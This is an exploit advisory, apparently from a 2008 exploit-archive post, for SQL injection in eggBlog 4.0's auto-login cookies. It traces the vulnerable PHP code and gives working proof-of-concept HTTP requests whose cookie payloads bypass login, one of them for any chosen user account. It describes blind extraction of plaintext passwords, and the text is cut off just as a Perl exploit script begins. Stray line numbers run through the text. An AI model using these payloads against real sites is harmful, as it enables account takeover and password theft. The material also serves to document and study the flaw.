# Author: __GiReX__
# mySite: girex.altervista.org
# Date:   27/03/2008 - 01/04/2008 (exploit added for str0ke)
# CMS:  eggBlog 4.0
# Site: eggblog.net
# Bug 1:  SQL Injection via cookie values (the auto-login cookie is read unescaped)
# Type 1: Admin/User authentication bypass
#
# Bug 2:  Blind SQL Injection (same cookie values, same query)
# Type 2: Password retrieval exploit
# Vars: $_COOKIE['email'], $_COOKIE['password']
# Need: magic_quotes_gpc = Off -- the payloads below rely on a literal double quote to
#       break out of the string; with magic quotes on, PHP would escape it to \" before
#       it reaches the query and the injection would fail.
17 # File: index.php
18
require_once "_lib/global.php";
19
...
20
eb_pre();
21
22 # File: /_lib/globals.php  (index.php above requires it as "_lib/global.php" -- one of the two spellings is a typo in this write-up)
23
require_once ’_lib/user.php’;
24
...
25
function eb_pre() {
26
...
27
if(isset($_COOKIE[’email’]) && isset($_COOKIE[’password’]) && !isset($_SESSION[’user_id’])) eb_login($_COOKIE[’ema
il’],$_COOKIE[’password’],1);
28
# Note the third argument: eb_pre() passes 1 as $key. Now look at eb_login():
31 # File: /_lib/user.php
32
function eb_login($email,$password,$key) {
33
...
34
if($key==0) $password=md5($password);
35
# eb_pre() calls eb_login() with $key = 1, so the md5() branch is skipped (only $key == 0
# hashes the value) and the raw cookie string goes straight into the query below.
$sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND md5(user_password)=\"".$password."\"";
39
$query=mysql_query($sql);
40
# Both $email and $password are concatenated into the SELECT with no escaping at all:
# no mysql_real_escape_string(), no prepared statement, no type check. Any cookie value
# containing a double quote rewrites the WHERE clause.
43 PoC 1:
44
GET [PATH]/index.php HTTP/1.1
45
Host: [HOST]
46
...
47
Cookie: email=@" OR "1; password=@" OR "1
48
# The WHERE clause becomes:  user_email="@" OR "1" AND md5(user_password)="@" OR "1"
# AND binds tighter than OR, so the trailing OR "1" makes it true for every row; the query
# returns the first record of eb_users (often, but not necessarily, the admin account)
# and you are logged in as that user.
51 PoC 2:
52
GET [PATH]/index.php HTTP/1.1
53
Host: [HOST]
54
...
55
Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID]
56
# The trailing AND user_id="..." narrows the always-true clause to a single row, so this
# logs you in as whichever user_id you choose instead of just the first record.
##############################################################################################################
# Blind SQL Injection / password retrieval exploit
#
# NOTE: the query applies md5() to user_password inside SQL, which means the column holds the
# password in plain text -- a blind injection here recovers the real password, not a hash.
# mysql_query() runs a single statement, so stacked queries are out; blind extraction through
# this login oracle is slow, so grab a coffee...
##############################################################################################################
63 #!/usr/bin/perl −w
64
65 # EggBlo